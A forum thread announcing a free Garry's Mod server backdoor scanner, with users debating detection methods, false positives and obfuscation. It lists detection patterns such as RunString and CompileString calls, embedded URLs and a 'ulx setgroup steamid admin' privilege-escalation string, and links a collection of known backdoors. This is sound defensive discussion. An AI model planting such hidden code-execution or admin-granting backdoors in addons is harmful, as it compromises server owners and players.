https://cdn.discordapp.com/attachments/418376555585077248/463799728815996938/banneridea2.png
Backdoors are becoming a more common thing which servers have to tackle, and during summer they tend to have a pretty major surge in frequency, which seems to be getting larger due to the easy access of old backdoors for skids. People have attempted to make Lua backdoor scanners before - but this turns into a constant "cat & mouse" game between the Lua-based scanner and the Lua-based backdoors.
Ideally we need something that operates outside of the Lua environment, that's easy for people to use, and fast. I believe we've made something that can help out here.
For free, you can deploy a 24 hour server, upload your addons/gamemodes you want scanning - and click the scan button in our game panel. Our scanner will help people find the following patterns in code, often used with backdoors:
SteamID's
Arbitary Code Execution(RunString, CompileString, etc)
External Networking (URL's used in code)
User group modification, and ULX used in strings (eg. "ulx setgroup steamid admin")
Huge indentation (often used to hide backdoors)
Console Commands
IP Tracking
& known URLS/IP's associated with backdoors which have been identified on various forums.
The massive advantage to tacking the issue from this angle is that backdoors can't interfere with the tool in Lua, like addon-based backdoor scanners work. This is totally operating outside of the server.
This system is designed to be used by people who know what they're doing, but to make their lives much easier. It's much faster than doing this yourself through grep, and it's displayed in a much more palatable form-factor. We hope that some people find this useful in identifying and removing backdoors, and if you find any please let us know, especially if they're on the workshop. If there is anything you think we've missed, then please let us know about that, too! Any workshop addon reports should also be forwarded to rubat@facepunch.com.
As a side note - If you're an addon developer that's getting a lot of complaints about legitimate code in your addon being identified as a backdoor, feel free to reach out to us, and we'll work with you to help alleviate these issues. We have added disclaimers to try & prevent this in the first place.
Here's a screenshot of the scanner to give you guys an example of what to expect:
https://owo.whats-th.is/a1314d.png
Death to backdoors \o/
if you are a skid host looking to steal this your mother will die in her sleep if you dont say "crident did it first"
oof
why.
just why.
Haven't tested it with actual backdoors till now and so far it works great! I added all the "backdoors" (some like commander's drm code are not backdoors, still detected tho) from this repo: https://github.com/RyanJGray/Backdoor_Busting_2015/
So far all of them are detected:
http://i.avasdemon.rocks/firefox_2018-07-03_16-35-42.png
http://i.avasdemon.rocks/firefox_2018-07-03_16-39-44.png
(tons more under)
Not to mention it was almost instant when this got detected and is lively updated so you don't have to wait for a full page load to get everything to show, just watch every backdoor get detected one by one in a few seconds.
(If ya don't believe me feel free to try on the trials \o7)
There is no backdoor when you re-code all of addons 😎
until you code a backdoor in case it gets leaked <pepe>
Looks nice.
oh hey, the coding example was done on my industrial nightmare gamemode. neato!
sorry for exposing your backdoors! as a note for anyone reading this, those are false positives on that gamemode - it was just a nice looking example screenshot lmao
it doesn't have any backdoors (last i checked), it just has a lot of steamids because the way i do whitelisting is terrible. i'm not mad or anything i just thought it was giggle worthy
Soon tm
Even though you stated that this is for people who know what they are doing, you must know that people who are clueless will still try to use it too. I think there should be a greater focus on showing what has been detected rather than a severity level. For instance, you might decide to detect the use of kick and ban functions, and you can tag those detections as "admin mod". This way, people will have a better idea of how alarmed they should be by it. An addon that isn't an admin mod being tagged as an admin mod would be a good indicator of unwanted behavior. This is probably a bad example though, as most backdoors I've seen posted on these forums try to use ulx console commands to do that sort of thing.
Also, if you aren't already, you should do something a little more comprehensive than just searching for strings. Detecting what it actually does is more preferable to detecting possible obfuscation. I have a concept for a backdoor scanner that would be able to defeat most obfuscations.
Does it happen to be using a Lua tracer?
I was thinking more along the lines of parsing the Lua code and building a syntax tree. Then, simplify it as much as possible (de-obfuscation). Then, scan for bad things. It would, as a last step, run the code and check for bad things as it runs. This would be to catch attempts at trying to outsmart the de-obfuscation. I have yet to see any obfuscation that would do so, but the mere existence of the scanner would promote it. Hell, the mere existence of this very post might promote it.
Some kind of hosting on your own server would be nice.
I feel pretty unsafe uploading all my addons xD
but then how will we steal all the addons???
Well I know that you're pretty trustworthy but well I rather host stuff on my own server at home.
We're planning on releasing a guide on our forums sooner or later on the best ways to pick out actual backdoors instead of a false positive, but for now the discord we link on the page lets people join and ask freely, which is recommended.
There's an actual pro to false positives, if we whitelisted let's say ulx directories or something to prevent false positives people who make backdoors will see that and try to hide their backdoors. It's better to display everything but keep a tick to allow people to see potential actual false positives than just to completely hide them completely. (this goes for categorizing too, you can make your backdoor look harmless by tricking the system into placing it into the "admin mod" category)
I'm not convinced. Both of those could be found with RegEx.
_G access is very broad and undescriptive. All that means is obfuscated code is likely present. Code is often obfuscated to hide backdoors, but some people are overly paranoid about people stealing their code and will obfuscate more benign things. Your scanner would be more useful if it dove into what the obfuscated code actually does, and detected bad things. That means de-obfuscating it first.
I think there is some miscommunication on my behalf - I wasn't trying to say it doesn't search for specific strings, because it does. I thought you were saying that the detection type should be explained to the user, which we do.
This tool isn't supposed to find the backdoors for you, I'm not aware of a way you can, with 100% reliability, know what is and what isn't a backdoor. This scans your server for code which backdoors would need to use in their execution, like RunString, or hard coded SteamID's for example. This is basically a faster way than people having to grep their own addons to find a possible backdoor, while presenting the results in a more easily "digestible" form factor than an SSH/cmd window.
It sounds like your idea is pretty neat though, and I hope you end up making it - it could help a lot of people
I agree with that, but there are "unwanted behaviors" the you can detect with a high degree of certainty. For instance, finding embedded steam ids means that there is a high likelyhood of the addon giving special treatment to specific users. Bonus points if you can detect these ids being compared to steam ids returned from player entities. Obfuscated code could be anything, however, and I think giving that a "high" severity level could potentially cause some unneccessary drama in the future.
Yeah, we do detect SteamID's if I hadn't already said that.
This is a valid concern. We have a system in place for content creators whom have legitimate usage for these. The most popular addons' almost all our clients use, already wont show up in the backdoor scanner - provided noone modifies the code in those addons. One key reason we made this post here is to make content creators aware so we can work with them to avoid these issues
We don't sell unmanaged dedi's - but I'm sorry you feel that way. Thanks for sharing your thoughts though
Sorry sweet heart, I don't know what you were expecting. Because of your feedback we'll try harder in the future
Because that isn't what we're trying to do here, this is supposed to find everything a backdoor would need to work, speeding up people who would have to search for this stuff themselves.
However we might build on it or develop a different tool that takes a different approach at a later date if enough people want it. As far as I'm aware no other hosts have done anything like this, so we're seeing what the engagement is like, and how much people actually want tools like this.
Thanks for the feedback, we'll look into developing more complex tools to address your concerns, but it's unlikely we'll remove the scanner, as that's designed to identify all possibly exploitable code on a server, for people who know what they're doing to analyse. You make it sound like your idea is easy to design - but there is a reason it's never been done before, it's not a straight forward thing to do.
The reason I might have come off as dismissive is because in Discord you were trying to get this post removed for reasons which are irrelevant to the actual post's goal, out of pure spite. You've been known to make things up about me & Crident and facilitate in spreading lies about me personally, before. As far as I'm aware, noone else is providing a tool to fight backdoors, and I agree it can be done better - so if you care so much, help out, and make something.
I doubt you will, though - because your only goal here is to try & make Crident/me look bad. I don't buy that you actually care about or believe the things you're saying.
Regardless, thanks for some actual feedback, but I would have appreciated that in your initial reply to this thread, instead of you just going straight to attack-mode:
You could setup a system that could automatically detect calls to hook.Add, net.Receive, concommand.Add, etc, and subsequently do path execution analysis to ensure non admins are unable to abuse it, and check whether it calls Lua entry points like RunString, CompileString, etc. It has been done before.
This sounds extremely dubious. Analysis of programs is hard. I'm not the most seasoned academic, but I believe the TL;DR of Rice's Theorem is that it's really hard.
https://en.wikipedia.org/wiki/Rice%27s_theorem
The way I see it, you could spend a week building a system like this, which generates more false positives but will find most malicious code, or you could spend three months engineering some kind of bullshitmagic static/dynamic analysis system, which is either going to be too lenient (VERY BAD) or too aggressive (the same as this).
A false positive is always better than a false negative because you actually have something to go by. If someone is too dumb to interpret the results, that is their problem. You might get one or two more bitchy comments on your workshop addon out of the thousands already there. So what?
Show me any system that claims to do this perfectly and I will give you at least one false positive or false negative. I know some people here have some kind of vendetta against Crident, and I can see why, but this seems very petty.
IMO because of all the variations you could do with obfuscation at runtime, any form of static scanning is impractical. Perhaps the easiest and most effective solution would be overriding critical function calls before any addons are able to load, then using a whitielisted filtering system with the ability for users to manually allow/block calls in some sort of panel
Sorry, you need to Log In to post a reply to this thread.
